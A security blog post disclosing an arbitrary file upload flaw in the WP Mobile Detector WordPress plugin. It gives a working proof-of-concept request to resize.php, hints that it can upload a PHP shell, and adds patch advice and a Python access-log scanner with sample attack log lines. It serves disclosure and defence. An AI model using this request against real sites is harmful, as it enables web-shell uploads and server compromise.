I am Aaditya Purani and I am going to show a PoC of the WP Mobile Detector <= 3.5 arbitrary file upload vulnerability. The WP Mobile Detector plugin automatically detects standard and advanced mobile devices and displays a compatible WordPress mobile theme. Some years ago this same plugin had an arbitrary file upload vulnerability in timthumb.php; this is another exploit, from 2016.
Still, more than 10,000 users are vulnerable to this [!]
This is a 0day arbitrary file upload vulnerability in WP Mobile Detector <= 3.5. I have tested this on the latest WordPress CMS version.
Let's begin. The vulnerable file in this plugin is located at /wp-content/plugins/wp-mobile-detector/resize.php.
Let's analyze the code of resize.php. The first four lines check whether the file already exists, based on the src parameter supplied in the request (GET or POST).
Moving to the else branch, file_get_contents() is used to fetch the contents of whatever we place in the src parameter, again via GET or POST. In my older blog post, I showed an example of abusing file_get_contents() that led to SSRF (Server Side Request Forgery). This can be abused if allow_url_fopen is enabled on the server; in that case the attacker can make the website load any file they want. After fetching the contents of the requested file, the code calls file_put_contents() to write them to the path variable, which points to /cache/$basename. The basename is the same as that of the file you fetched.
Joining the pieces, it is a simple bug: the code neither validates the file nor sanitizes input from untrusted sources. If no server-side security checks are performed, an attacker can easily turn the resize function into an arbitrary file upload.
Proof of Concept:
Below is the complete PoC of this vulnerability.
http://[wordpress site path]/wp-content/plugins/wp-mobile-detector/resize.php?src=[URL of File to upload]
You can also check by feeding an external image to the src variable, for example http://xyz.com/smile.png, and it will be saved to
http://[wordpress site path]/wp-content/plugins/wp-mobile-detector/cache/[file name]
In this case smile.png, but if you look carefully at the code there is also a way to upload a PHP shell script using the same request. 🙂
To patch this, quickly update the plugin to version 3.7, either from the admin dashboard or by visiting https://wordpress.org/plugins/wp-mobile-detector/ and following the Installation section. Another option is to disable the plugin, and a third option is to disable PHP execution in the /wp-mobile-detector/cache subdirectory. That is not a sufficient fix on its own, though, as there can be many other attack vectors if you only block PHP. You can also install a firewall or monitoring on your website to catch such 0days in future.
So the vendor decided to whitelist some extensions like png, gif, jpg, svg etc. and to check the fetched file against that list to filter out other extensions!
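As an added example (not code from the original post or from the plugin), here is a small log scan a defender could run to spot the access patterns described above: remote fetches through resize.php, src values whose extension falls outside the vendor-style image whitelist, and requests for .php files inside the cache directory. The log lines, IP addresses and file names are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs

RESIZE_PATH = "/wp-content/plugins/wp-mobile-detector/resize.php"
CACHE_PREFIX = "/wp-content/plugins/wp-mobile-detector/cache/"
IMAGE_EXTS = {"png", "gif", "jpg", "jpeg", "svg"}  # vendor-style whitelist

# Apache combined-style request line: client ip, then "METHOD URI PROTOCOL"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

# Constructed sample log lines; not taken from any real server.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jun/2016:10:00:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://example.org/smile.png HTTP/1.1" 200 512
198.51.100.7 - - [01/Jun/2016:10:00:05 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http%3A%2F%2Fexample.org%2Fshell.php HTTP/1.1" 200 512
203.0.113.9 - - [01/Jun/2016:10:01:00 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/shell.php HTTP/1.1" 200 80
203.0.113.9 - - [01/Jun/2016:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 4096
"""

def src_extension(src):
    """Lower-cased extension of the file named by a src URL ('' if none)."""
    name = urlsplit(src).path.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def classify(line):
    """Return (client_ip, verdict, detail) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, uri = m.groups()
    parts = urlsplit(uri)
    if parts.path == RESIZE_PATH:
        # parse_qs percent-decodes the src value for us
        src = parse_qs(parts.query).get("src", [""])[0]
        if not src:
            return None
        if src_extension(src) not in IMAGE_EXTS:
            return (ip, "resize_non_image_src", src)
        # even an image fetch is a remote fetch driven by the client (SSRF)
        return (ip, "resize_remote_fetch", src)
    if parts.path.startswith(CACHE_PREFIX) and parts.path.lower().endswith(".php"):
        return (ip, "php_requested_in_cache", parts.path)
    return None

def scan(log_text):
    """All suspicious hits in a block of access-log text, in file order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, verdict, detail in scan(SAMPLE_LOG):
        print(ip, verdict, detail)
```

Note that an extension whitelist alone only checks the name the remote server gave the file; a fuller fix should also verify that the fetched bytes really are an image before writing them under the web root.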
Take care till then. 😀